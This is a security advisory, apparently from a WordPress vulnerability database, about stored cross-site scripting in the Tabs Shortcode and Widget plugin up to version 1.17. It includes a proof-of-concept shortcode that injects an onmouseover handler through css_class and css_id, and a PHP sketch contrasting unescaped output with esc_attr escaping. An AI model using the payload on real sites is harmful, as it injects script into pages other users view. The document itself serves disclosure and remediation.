wpexploit - Dmitrii Ignatyev - WPEX-ID:6E67BF7F-07E6-432B-A8F4-AA69299AECAF
Feb 20, 2024 - 12:00 a.m.

Tabs Shortcode and Widget <= 1.17 - Contributor+ Stored Cross-Site Scripting

Tags: tabs widget, cross-site scripting, exploit, security vulnerability, stored data

AI Score: 7.7
Confidence: High
EPSS: 0
Percentile: 9.0%

Description: The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. The proof of concept below injects an onmouseover handler through the css_class and css_id attributes:

[otw_shortcode_tabslayout tabs="2" title="234" tab_1_title="34" tab_1_icon_url="http://123" tab_1_content="23" tab_2_title="123" tab_2_icon_type="general foundicon-page" tab_2_icon_url="123" tab_2_content="123" css_class='" onmouseover="alert(/XSS/)"' css_id='" onmouseover="alert(/XSS/)"'][/otw_shortcode_tabslayout]
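The missing step is escaping for the HTML attribute context. The following is an added example, not the plugin's code: the render functions, the "tabs" class name and the esc_attr() stand-in are hypothetical, and the sketch assumes the attribute values are concatenated into a div tag. It renders the css_id and css_class values from the shortcode above with and without escaping, then parses each result to list the attributes that end up on the element.

```php
<?php
// Added example; not the plugin's code. Function names are hypothetical.

// Stand-in so the file runs under the PHP CLI. Inside WordPress the real
// esc_attr() already exists and this definition is skipped.
if (!function_exists('esc_attr')) {
    function esc_attr($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES, 'UTF-8');
    }
}

// Vulnerable pattern: attribute values are concatenated into the tag as-is.
function render_tabs_unescaped(array $atts) {
    return '<div id="' . $atts['css_id'] . '" class="tabs ' . $atts['css_class'] . '"></div>';
}

// Hardened pattern: each value is escaped for the HTML attribute context.
function render_tabs_escaped(array $atts) {
    return '<div id="' . esc_attr($atts['css_id'])
         . '" class="tabs ' . esc_attr($atts['css_class']) . '"></div>';
}

// Parse the markup and list the attribute names that end up on the <div>.
function div_attribute_names($html) {
    libxml_use_internal_errors(true); // the broken markup triggers parser warnings
    $doc = new DOMDocument();
    $doc->loadHTML($html);
    $names = [];
    foreach ($doc->getElementsByTagName('div')->item(0)->attributes as $attr) {
        $names[] = $attr->nodeName;
    }
    return $names;
}

// css_id and css_class values taken from the shortcode on this page.
$atts = [
    'css_id'    => '" onmouseover="alert(/XSS/)"',
    'css_class' => '" onmouseover="alert(/XSS/)"',
];

foreach (['render_tabs_unescaped', 'render_tabs_escaped'] as $render) {
    $html = $render($atts);
    echo $render, ': ', $html, "\n";
    echo '  attributes on <div>: ', implode(', ', div_attribute_names($html)), "\n";
}
```

In WordPress, sanitize_html_class() is a stricter option for class values, since it keeps only letters, digits, hyphens and underscores.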
